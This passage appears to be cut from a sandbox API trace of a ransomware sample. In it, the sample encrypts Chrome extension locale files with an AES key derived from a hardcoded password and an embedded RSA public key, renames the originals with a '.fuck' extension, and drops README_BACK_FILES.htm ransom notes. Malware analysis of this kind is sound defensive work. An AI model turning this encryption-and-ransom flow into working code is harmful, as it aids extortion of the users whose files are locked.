(lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json", dwFileAttributes=0x0) returned 1 [0249.128] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.gsg")) returned 1 [0249.128] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\messages.json.fuck")) returned 1 [0249.129] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.129] CryptDestroyKey (hKey=0x2937538) returned 1 [0249.129] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.129] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.129] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.129] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\readme_back_files.htm")) returned 0xffffffff [0249.130] AreFileApisANSI () returned 1 [0249.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4378, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 157 [0249.130] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\es_419\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.130] GetFileType (hFile=0x5d54) returned 0x1 [0249.130] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.132] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.132] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0249.132] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.133] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.133] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.133] GetLastError () returned 0x0 [0249.133] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json")) returned 0x20 [0249.133] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json", dwFileAttributes=0x80) returned 1 [0249.133] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.134] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.135] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.136] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.137] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.137] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.137] CryptHashData (hHash=0x29387f8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.138] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937638) returned 1 [0249.138] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.138] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.138] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293e1a0) returned 1 [0249.138] CryptImportPublicKeyInfo (in: hCryptProv=0x293e1a0, dwCertEncodingType=0x1, pInfo=0x2930980*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29309b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29309b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937978) returned 1 [0249.138] CryptEncrypt (in: hKey=0x2937978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.138] CryptEncrypt (in: hKey=0x2937978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293eb30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293eb30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.138] WriteFile (in: hFile=0x5d58, lpBuffer=0x293eb30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293eb30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.139] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd8, lpOverlapped=0x0) returned 1 [0249.140] CryptEncrypt (in: hKey=0x2937638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.140] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.140] CloseHandle (hObject=0x5d5c) returned 1 [0249.141] CloseHandle (hObject=0x5d58) returned 1 [0249.141] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), bFailIfExists=0) returned 1 [0249.143] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json", dwFileAttributes=0x0) returned 1 [0249.144] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.gsg")) returned 1 [0249.145] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\messages.json.fuck")) returned 1 [0249.145] CryptDestroyHash (hHash=0x29387f8) returned 1 [0249.145] CryptDestroyKey (hKey=0x2937638) returned 1 [0249.145] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.145] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.145] FindClose (in: hFindFile=0x2938978 | out: hFindFile=0x2938978) returned 1 [0249.146] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\readme_back_files.htm")) returned 0xffffffff [0249.146] AreFileApisANSI () returned 1 [0249.146] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.146] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\et\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.146] GetFileType (hFile=0x5d54) returned 0x1 [0249.146] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.147] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.148] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.148] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.148] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.148] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.148] GetLastError () returned 0x0 [0249.148] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json")) returned 0x20 [0249.149] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json", dwFileAttributes=0x80) returned 1 [0249.149] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.149] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.150] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.150] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.152] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.152] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.152] CryptHashData (hHash=0x2938978, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.152] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29374f8) returned 1 [0249.152] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.152] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.152] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293ed50) returned 1 [0249.153] CryptImportPublicKeyInfo (in: hCryptProv=0x293ed50, dwCertEncodingType=0x1, pInfo=0x2930bf0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930c20*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930c28*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29379b8) returned 1 [0249.153] CryptEncrypt (in: hKey=0x29379b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.153] CryptEncrypt (in: hKey=0x29379b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293e4d0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293e4d0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.153] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293e4d0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293e4d0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.154] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd8, lpOverlapped=0x0) returned 1 [0249.155] CryptEncrypt (in: hKey=0x29374f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.155] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.155] CloseHandle (hObject=0x5d58) returned 1 [0249.155] CloseHandle (hObject=0x5d5c) returned 1 [0249.155] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), bFailIfExists=0) returned 1 [0249.158] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json", dwFileAttributes=0x0) returned 1 [0249.158] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.gsg")) returned 1 [0249.159] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\messages.json.fuck")) returned 1 [0249.160] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.160] CryptDestroyKey (hKey=0x29374f8) returned 1 [0249.160] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.160] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.161] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.161] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\readme_back_files.htm")) returned 0xffffffff [0249.161] AreFileApisANSI () returned 1 [0249.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e39a0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.161] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fi\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.161] GetFileType (hFile=0x5d54) returned 0x1 [0249.162] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.163] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.163] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\fil\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.163] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.163] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.163] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.163] GetLastError () returned 0x0 [0249.164] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 